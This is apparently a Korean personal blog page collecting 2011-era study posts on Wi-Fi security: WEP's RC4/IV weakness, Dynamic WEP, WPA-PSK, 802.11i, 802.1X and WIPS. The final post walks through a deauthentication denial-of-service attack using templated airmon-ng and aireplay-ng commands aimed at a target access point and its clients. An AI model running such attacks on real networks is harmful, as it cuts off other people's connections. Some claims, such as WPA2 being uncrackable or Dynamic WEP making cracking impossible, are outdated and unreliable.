그럼 여기서 EAP-TLS는 무엇이냐..



우선 이는 보안 알고리즘이라고 생각하시면 됩니다.




기본적으로 무선랜 카드의 고유한 번호인 MAC 주소를 이용한 MAC 인증 이외에, 포트 기반의 802.1X 인증 방식으로는 EAP-MD5,  EAP-TLS, EAP-TTLS, PEAP 등이 있습니다.



EAP-MD5는 사용자의 ID와 패스워드를 이용하여 무선랜에 접속하는 방식이며, EAP-TLS는 서버 인증서와 개인 인증서의 상호 인증을 통해 무선랜에 접속하는 방식입니다. 



EAP-TLS는 인증서 기반 인증 방식이므로 높은 보안 성능을 갖추고 있습니다.



또한 EAP-TTLS와 PEAP는 인증서가 설치된 서버와 개인 사용자간 터널을 이용하여 암호화된 인증 정보를 주고 받는 방식으로 높은 보안 레벨과 편리성을 갖춘 방식입니다. 



이를 WEP와 연관지어 설명해 보겠습니다.


WEP가 크랙된 이유는 RC4라고하는 암호화알고리즘이 10년전인 2001년에 그 알고리즘이 풀렸기 때문인데요.


WEP는 RC4라고하는 암호화 알고리즘을 사용합니다.






이 RC4의 동작 방식을 우선 쉽게 알아보겠습니다


우선 평문(평문은 cleartext 또는 plaintext라고도 합니다.)을 체크섬을 통해서 오류가 있는지 검사를 합니다.


그리고 그것을 RC4라고하는 믹서기에 넣어줍니다.


그리고 key값과, IV라고하는 암호화 뚜껑 역시 RC4라는 믹서기에 넣어줍니다.


그리고 XOR이라는 버튼으로 믹서기를 갈아줍니다.


그렇게 되면 사이퍼텍스트 즉, 암호문이 생성이 됩니다.




허나, 여기에는 문제점이 있었습니다. 그것은 그림에도 나와있지만 암호화뚜껑인 IV가 그대로 사이퍼텍스트와 함께 내려왔다는것!!


그럼 IV를 를 알고있으니까.. 키도 알 수 있고.. RC4도 뚫렸으니까 알수있을거고 encryption된 값도 알 수 있잖습니까?


바로 이러한 취약점으로 WEP는 위험한 무선 보안 프토토콜이였습니다.




하지만 여기서 KEY를 수시로 변경시켜버리면 어떻게 될까요?



우선적으로 IVs를 모은다..해도 key가 수시로 바뀌어버리니 데이터를 모으는 의미가 없어집니다.


RC4의 알고리즘이 풀렸다지만,IV를 아무리 모아서 키값을 얻는다 해도 이미 그 시점이 되면 또 키가 바뀌어 있을게 뻔하니까..


결론은 자신이 얻은 키 값과 현재의 키 값이 서로 다르기 때문에 매칭시키는게 다르잖아요? 쉬운 예를 들어볼까요??


WEP는 그냥 열쇠를 찾아서 열쇠 구멍에 끼우면 바로 열리게 되어있습니다.



하지만 Dynamic WEP는 열쇠를 찾아서 열쇠 구멍에 끼우면 열쇠구멍이 달라서 끼워지질 않게되고 이게 또 자꾸만 바뀝니다.. 


그러기때문에 Dynamic WEP는 크랙이 불가능하지는 않을지언정 매우 강력한 보안성을 지니고 있습니다.


Dynamic WEP가 궁금한데 자료를 찾지 못해서 제가 그냥 만들어서 올립니다.


저처럼 찾으시는 분들은.. 좋은 정보를 얻어가시길 바랍니다.




-이 글의 펌/복사/변조 등을 절대적으로 금지합니다-



출처 - 옛날 블로그 2011/02/21 13:49


'공부 > Network' 카테고리의 다른 글

[802.11] 4가지 오해들  (0) 2012.06.29
[802.11] Phishing Attack  (2) 2012.06.29
[802.11] WPA-PSK, AES, TKIP  (0) 2012.06.29
[802.11] WIPS  (1) 2012.06.29
[802.11] 802.11i  (0) 2012.06.29
Posted by extr
:

WPA - PSK (Wi-Fi Protected Access - Pre Shared Key)


무선랜을 구축할 때 암호화 방식을 사용하는 경우는 크게 세 가지로 나누어 볼 수 있습니다.


오픈 시스템 인증 방식에 WEP 암호화를 사용하지 않는 경우와  오픈 시스템 인증 방식에 WEP 암호화를 사용하는 경우, 


그리고 마지막으로 쉐어드 키 인증 방식에 WEP 암호화를 사용하는 경우입니다. 


이 세가지 방식은 보안에 매우 취약하며, WEP 키를 알아내는 방법 또한 많이 알려져서 위험에 노출되어 있는 상황입니다.




오픈 시스템 (without WEP encryption)


오픈 시스템은 글자 그대로 인증이 없는 경우(즉, Null Authentication)입니다.


인증 없이 접속하고 사용하는 데이터는 암호화를 하지 않는 구성이 바로 이 구성입니다.


이러한 구성의 장점은 네트워크 성능이 가장 좋으며 사용자가 구성하고  사용하기에 가장 편리하다는 데 있습니다. 


대부분의 경우 장비의 기본 셋팅 만으로도 동작을 하며 사용자는 IP 주소만 설정해 주면 됩니다.


단점으로서는 보안이 떨어진다는 점입니다. 


이 구성을 공격하는 방법과 프로그램에는 여러 가지가 있으며 또한 공격 방법들이 상대적으로 단순하고 쉬워서 절대로 권장할 수 없는 구성입니다.



오픈 시스템 (with WEP Encryption40/104bit) 


오픈 시스템 인증은 인증이 별도로 없기 때문에 누구나 AP에 접속할 수 있지만 WEP 인크립션(Encryption)을 통해 데이터를 암호화하므로 


WEP 키를 알지 못하면 통신이나 도청이 불가능합니다. 


그러나 이미 발견된 WEP 알고리즘의 취약점으로 인해 WEP 키를 암호화된 데이터 트래픽만 가지고 알아낼 수 있는 기법들이 다양하게 알려지고 있습니다.





쉐어드 키 인증 (with WEP Encryption 40/104bit)


쉐어드 키 인증은 사용자가 AP에 접속 시 미리 설정한 WEP 키를 알아야만  인증을 하도록 하는 방법입니다. 


이러한 방법은 원래의 목적대로라면 오픈 시스템보다 보안성이 높아야 하지만 알고리즘의 취약점으로 인해 오히려 보안성이 떨어집니다.


쉐어드 키 인증 알고리즘은 단순한 챌린지 리스폰스(Challenge-Response)  인증 방식을 응용한 것으로 리플레이(Replay) 공격이나  딕셔너리(Dictionary) 공격을 방어하는 수단이 갖춰져 있지 않습니다. 


따라서 굳이 WEP 알고리즘의 취약점을 공격하지 않아도 인증 패킷만 스니핑을  해도 손쉽게 WEP 키를 알아낼 수 있는 것입니다. 


일단 WEP 키를 알아낸 후 AP에 접속하면 암호화 역시 동일한 키를 사용하므로 쉽게 내부 사용자와 같은 권한을 취득할 수 있습니다.





WPA - PSK (Wi-Fi Protected Access - Pre Shared Key)의 사용 배경, 동작 원리



기존의 WEP 암호화 방식은 취약한 보안으로 인해 기업환경에서는 거의 사용이  불가능해진 상태입니다. 


WEP 알고리즘은 IV(Initialization Vector)의 평문전송, 키 스트림의 단순성, 고정키 사용에 따른 RC4 키 갱신 부재 등으로 인해 키 길이에 상관없이 그 보안기능이 취약하다고 판명되었습니다.


사용자들이 WEP 사용에 인색한 이유는, 대부분의 무선랜 제품들이 "WEP 사용안함"을 기본 설정으로 출고 되기 때문에, 사용자들 역시 이 기능을 "사용함"으로 설정하는걸 잊은채(혹은 귀찮아서) 그냥 내버려 둔다는게 첫 번째이며, 


두 번째는 WEP 설정시 연결이 잘 안된다거나, 초보자들의 경우  여러가지 옵션(ASCII, Hexadecimal, PassPhrase등)이나 키 입력 과정의 복잡함(?)이 그 이유였습니다. 


WPA는 옵션이나 키 입력의 방식이 WEP방식 보다 간단하여 설정하기 더욱  편리해 졌습니다.


WPA는, 대칭벡터(IV : Initialization Vector)라 불리는 WEP 헤더의 취약점 (고정 암호키 방식)을 해결하기 위해 그 대응책으로 개발되었습니다.


데이터 암호화를 강화하기 위해 TKIP(Temporal Key Integrity Protocol)과  AES(Advanced Encryption Standard)라는 IEEE 802.11i 보안 표준을 사용합니다.





TKIP(Temporal Key Integrity Protocol)은 순서 규칙이 있는 48비트 초기화  벡터(WEP에서는 24비트 초기화 벡터)를 이용하는데, 


이것은 키 재사용 및 재생 공격을 방지해 줍니다. 또한 WEP 취약 키 공격을 막아주는 패킷 당 키 혼합 기능과, 패킷 위조 공격을 막아주는 암호 체크섬 키 기능이 있습니다. 

 



AES(Advanced Encryption Standard)는 128, 192, 256 비트 등의 가변 키 크기를  가지는 수학적 암호화 알고리즘을 사용합니다.


암호화된 데이터는 AES 알고리즘의  키 없이 원래 데이터로 되돌리기가 거의 불가능하기 때문에 타인이 데이터를 송신하는 전파를 수신하더라도 기밀이 유출되는 사태를 막을 수 있습니다.




즉, 무선 통신상의 전송내용을 암호화하는 암호키가 기존 WEP에서는 고정되어 있던 것과 달리, WPA는 암호키를 특정 시간이나 일정 크기의 패킷 전송 후에 자동으로 변경시키기 때문에 해킹이 불가능하다는 것입니다. 


또한, 암호키 생성 진행과정이 매우 정교하고 키 갱신이 매우 신속하게 이루어지기 때문에, 암호를 해독하기 위한 충분한 데이터를 모으기가 불가능합니다. 


시스템 성능에 영향을 주지 않으며 소프트웨어 업그레이드를 통해 이용 가능 하여 SOHO 사용자들에겐 WPA-PSK라는 특정 모드로, 기업과 같이 인증서버 없이도 강력한 보안을 제공합니다.


종합해 보면 인증 방법들의 보안성의 우수한 순위가 다음과 같이 정리 됩니다.





오픈 시스템(WEP사용안함) < 쉐어드 키 인증 < 오픈 시스템(WEP사용함) < WPA - PSK 




참조 - 김성훈의 네트워크

출처 - 옛날 블로그 2011/02/21 03:15


'공부 > Network' 카테고리의 다른 글

[802.11] Phishing Attack  (2) 2012.06.29
[802.11] Dynamic WEP  (1) 2012.06.29
[802.11] WIPS  (1) 2012.06.29
[802.11] 802.11i  (0) 2012.06.29
[802.11] 802.1x  (1) 2012.06.29
Posted by extr
:

[802.11] WIPS

공부/Network 2012. 6. 29. 16:22 |


WIPS란?


Wireless intrusion prevention system


즉, 무선 침입 차단(방어) 시스템을 의미합니다. 


우선 IPS(침입 차단 시스템)가 무엇인지 알아봐야겠죠?



----------------------------------------------------------------------------------------------------------------------------------------------------------------------

침입 차단 시스템(侵入遮斷 - , 영어: Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS))은 외부 네트워크로부터 내부 네트워크로 침입하는 네트워크 패킷을 찾아 제어하는 기능을 가진 소프트웨어 또는하드웨어이다. 


일반적으로 내부 네트워크로 들어오는 모든 패킷이 지나가는 경로에 설치되며, 호스트의 IP주소,TCP/UDP의 포트번호, 사용자 인증에 기반을 두고 외부 침입을 차단하는 역할을 한다. 


허용되지 않는 사용자나 서비스에 대해 사용을 거부하여 내부 자원을 보호한다.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

<위키백과>





한마디로 내부네트워크에 침입하려는 외부 네트워크 패킷을 차단시키는 소프트/하드웨어란 의미입니다.




그럼 WIPS란??



맞아요 그냥 무선만 가져다 붙이면 되는겁니다. 

네트워크에 침입하려는 '무선'외부 네트워크 패킷을 차단시키는 거지요.



바로 이런 구조가 되어버립니다.


초록색 서버같은게 바로 WIPS입니다. 이는 백본 즉, 중앙에 설치되어 있어야 모든 통제가 가능하겠죠?


그리고위에는 센서가 있습니다.


이 센서는 외부로 들어오는 무선전파를 잡아주는 역할을 수행합니다.


그럼 그 무선전파를 WIPS에서 차단시켜버리겠지요?


이상입니다.



WIPS관련 뉴스입니다~ >> http://www.boannews.com/media/view.asp?idx=8793&kind=1





출처 - 옛날 블로그 2011/02/13 17:09


'공부 > Network' 카테고리의 다른 글

[802.11] Dynamic WEP  (1) 2012.06.29
[802.11] WPA-PSK, AES, TKIP  (0) 2012.06.29
[802.11] 802.11i  (0) 2012.06.29
[802.11] 802.1x  (1) 2012.06.29
[802.11] DoS Attack  (0) 2012.06.29
Posted by extr
:

[802.11] 802.11i

공부/Network 2012. 6. 29. 16:21 |



지난번의 802.1x의 인증기술에 이어서


이번에는 802.11i라는 암호화 방식에 대해 설명해 드리겠습니다.








먼저 겉을 살짝 보겠습니다.


802.11에는 802.1x처럼 IEEE 규격이 2가지가 있습니다.


WPA 버젼 1과 버젼 2인데요.이는 암호화 방식에 따라 분류한거랍니다. 당연히 버젼 2가 더 강력한 방식이겠죠?




또한 802.11i는 enterprise mode와 personal mode로 규정되어있는데


엔터프라이즈 모드란, 말 그대로 기업같은 곳에서 사용할 정도의 암호화 모드고


퍼스널 모드란 소호 또는 개인이 쓰는 암호화 모드랍니다.




그럼 이제 암호화 방식에 대해 들여다 볼까요?


802.11i의 WPA 버젼 1의 암호화 방식은 TKIP(Temporal Key Integrity Protocol)을 사용합니다.


TKIP은 그냥 단순히 취약한 암호화 방식이라고 생각하십시오.



하지만 WPA 버젼 2에서는 다른방식인 CCMP(Counter mode with CBC-MAC Protocol)암호화 방식을 사용하는데요


당연히 버젼이 올라갔으니 이전의 취약점을 보완했겠죠? 

그래서 CCMP는 가히 무적이라고 칭할 수 있습니다.





결론적으로 말씀드리자면 기업모드 WPA버젼1은 인증과정에서 802.1x/EAP의 인증강화로 인해서 깨지질 않습니다.


하지만 개인모드의 WPA-1에서는 TKIP을 이용하기때문에 깨질 수 밖에 없습니다.


WPA2는어떨까요?




WPA2또한 기업모드는 인증과정에서 802.1x부터 걸리기 때문에 깨지질 않고..


개인용은 인증절차는 깨져버립니다. PSK를 사용하기 때문에.. 허나, 암호화 방식이 CCMP이기에 이게 걸려버립니다. 


아직까지도 이 방식은 깨지질 않습니다.





그래서 결론은 WPA2가 훨씬 강화된 보안 방법이더라고 할 수 있습니다.





추가적으로 한 가지 더 알아보도록 하겠습니다.


WEP크랙할 때 기억나시죠?


기존 WEP는 키 값이 고정되어있어서 쉽게 추측해 낼 수 있었습니다.


하지만 802.11i에는 새로운 WEP가 생겼습니다.


그건 바로 Dynamic WEP(동적 WEP)인데요.


이는 기존의 WEP의 취약한 부분인 static Key를 dynamic으로 바꿔 

난수의 시간동안 WEP를 생성하는 겁니다.


이렇게 되면 crack하는 것 자체가 정말 불가능해집니다.

크래킹할 시간동안 키가 몇 번이고 바뀌어 있을테니까요..crack 자체가 무의미해집니다.






802.11i를 정리해보자면 이렇습니다.



802.11i란, 데이터 암호화 방식인 IEEE 802.11의 표준이랍니다.


802.11i에는 기업용과 개인용이 있는데 기업용의 인증방식은 802.1x,개인용은 PSK로 개인용은 인증절차가 취약하다는 것.


그리고 그 내부에는 동적 WEP(Dynamic WEP) WPA 그리고 WPA 2가 있었습니다


Dynamic WEP란, 동적으로 WEP를 계속해서 생성해주어 크랙을 막을 수 있습니다.


WPA란 TKIP이라는 취약한 암호화 방식때문에 크랙될 수 있습니다.


하지만 WPA2는 CCMP라는 암호화 방식으로 더욱 강화되어 아직까지 크랙된 사례가 없습니다.



이상입니다.




출처 - 옛날 블로그 2011/02/13 05:17



'공부 > Network' 카테고리의 다른 글

[802.11] WPA-PSK, AES, TKIP  (0) 2012.06.29
[802.11] WIPS  (1) 2012.06.29
[802.11] 802.1x  (1) 2012.06.29
[802.11] DoS Attack  (0) 2012.06.29
[802.11] WPA Crack  (0) 2012.06.29
Posted by extr
:

[802.11] 802.1x

공부/Network 2012. 6. 29. 16:20 |





IEEE 802.11 무선 랜(WLAN)용 인증 구조 제공으로 보안을 강화한 무선 랜의 표준. 


인증 메시지 교환 시에는 이더넷, 토큰 링 혹은 무선 랜에서 기존의 통신 규약인 EAP(Extensible Authentication Protocol) RFC 2284를 사용하며,


인증 절차는 사용자가 인증 기관에 접근 요청→인증 기관은 사용자의 EAP 시작 메시지만 송신 허용하는비 인증 상태 유지→인증 기관이 사용자 ID를 요구하는 EAP 메시지 송신→사용자 ID 회신→인증 기관 인증 서버에 전송→인증 서버에서 


인증 알고리듬에 의거 수락 혹은 거부 메시지를 인증 기관에 회신→수락 시 인증 기관은 사용자를 인증 상태로 전환, 정상트래픽을 수행한다.


<네이버 사전>


쉽게 말해서 포트 기반의 네트워크 접근 제어 기능을 하는 WLAN 접속 인증 규격을 말합니다.


말로 설명하면 쉽게말해도 어려우니까..그냥 그림으로 봅시다





 

 supplicant란 자신의 정보를 입력하고 인증 결과를 받는 클라이언트를 말합니다.


한마디로 그냥 인증을 요청하는 station이라고 볼 수 있겠습니다.


authenticator란 유저 정보를 중개해주고 인증 결과에 따라서 통신을 허가시켜주고 차단시켜주는 인증 장치를 말합니다.


쉽게 말해, AP 즉, 공유기라고 할 수 있습니다.


authentication server는 전달받은 유저정보를 데이터베이스와 대조시켜 허가/불허를 판단하는 인증 서버 입니다.


그냥 데이터 베이스 서버라고 생각하시면 편합니다.



EAP는 무선랜 클라이언트와 RADIUS(Remote Authentication Dial-in User Service) 서버간의 통신을 가능하게 하는 프로토콜입니다.





이제 그 절차를 한번 보겠습니다.


먼저 station은 AP에게 접속 요청을 보냅니다. 그러면 AP는 station에게 잠시 기다려 보라고하며 server에게 


그럼 서버는 station에게 인증 challenge라는 난수를 전송합니다.


그럼 station은 자신의 ID와 password를 전달받은 난수와 더해서 해쉬값으로 만들어버린 후 서버에게 전송시킵니다.


서버는 자신이 던져준 난수와 DB에있는 모든 ID와 PW를 더하여 전달받은 해쉬값과 비교를 합니다.







그렇게 참이란게 서버에서 인증이되면, station에서도 서버를 인증하게 되어 상호간에 인증을 하게됩니다.


그럼 서버는 AP에게 WEP를 던져주게 되고 AP는 그 키를 암호화하여 station에게 전송합니다


(이 과정은 서버에게 세션 키를 받아, AP에게 전송시키면 AP는 이 세션 키를 이용해 브로드캐스트 키를 암호화시켜 그 암호화된 키를 전송한다더군요)


그럼 그 키가 확정되면서 통신이 이루어지는 겁니다.




출처 - 옛날 블로그 2011/02/13 02:15


'공부 > Network' 카테고리의 다른 글

[802.11] WIPS  (1) 2012.06.29
[802.11] 802.11i  (0) 2012.06.29
[802.11] DoS Attack  (0) 2012.06.29
[802.11] WPA Crack  (0) 2012.06.29
[802.11] WEP Crack  (10) 2012.06.29
Posted by extr
:

[802.11] DoS Attack

공부/Network 2012. 6. 29. 16:19 |






실험에 앞서서 도스 공격이 무엇인지 살펴볼까요?



도스 (DoS)란, Denial of Service의 약자로 서비스 거부 공격을 의미합니다.



이는 가용성을 침해하는 공격이라고 할 수 있는데, 그 이유는 가용성을 유지하면서 계속되던 서비스가



갑자기 멈추거나 비 정상적으로 작동이 되기 때문입니다.



과연 무선에서는 어떤 구조로 이루어져 있는지 봅시다.


 



인증과정이면 De-authentication으로 인증을 거부해버립니다.



혹은 결합과정인 경우 Di-association으로 결합을 거부해버립니다.



이렇게 되면 어떻게 될까요?



정상적인 서비스가 이루어지고있는데 갑자기 결합거부 혹은 인증거부가 생겨버리면 연결이 끊어지게 됩니다.



크래커들은 대개 이 틈을 노리고 공격을 합니다. 아주 치명적인 공격이지요..



하지만 이 치명적인 공격은 매우 짧은 명령어로 한번에 이루어진답니다.. 그렇기 때문에 더 위험하답니다.



그럼 한번 시작해 봅시다.



명령어는 매우 간단합니다.



우선 모니터링 모드로 하나 만들어 줍니다.(자세한 설명은 WEP 공격을 참고해 주시길 바랍니다)



>airmon-ng start <무선 NIC이름> -c <공격할 AP의 채널>




이제부터 공격을 실행합니다.



공격은 한 줄의 명령어를 통해 이루어 집니다.




>aireplay-ng -0 <날릴 패킷 갯수> -a <공격대상 BSSID> -c <공격 대상 station MAC> <모니터링 NIC명>




-0번은 WPA 공격에서 설명하였듯이 DoS공격의 번호입니다.




공격할 station에는 대상 AP와 연결되어있는 특정 station을 말합니다. 이것을 적어야 서로와의 연결을 끊어버릴 수 있습니다.




만약 저 공간에 아무것도 넣지않게 되면 해당 AP에 연결되어있는 모든 station의 연결을 끊어버립니다. 

브로드캐스트가 적용되는것이죠.






이런식으로 De-Authentication을 계속해서 날립니다.







핑도 끊기게 됩니다.



이런 위험한 DoS 공격은 효과는 강력하지만 보안에는 아직 미비한 점이 많습니다.


수고하셨습니다.




출처 - 옛날 블로그 2011/02/12 21:25



'공부 > Network' 카테고리의 다른 글

[802.11] 802.11i  (0) 2012.06.29
[802.11] 802.1x  (1) 2012.06.29
[802.11] WPA Crack  (0) 2012.06.29
[802.11] WEP Crack  (10) 2012.06.29
[802.11] Frame Control [802.11 frame,802.11 프레임]  (0) 2012.06.29
Posted by extr
: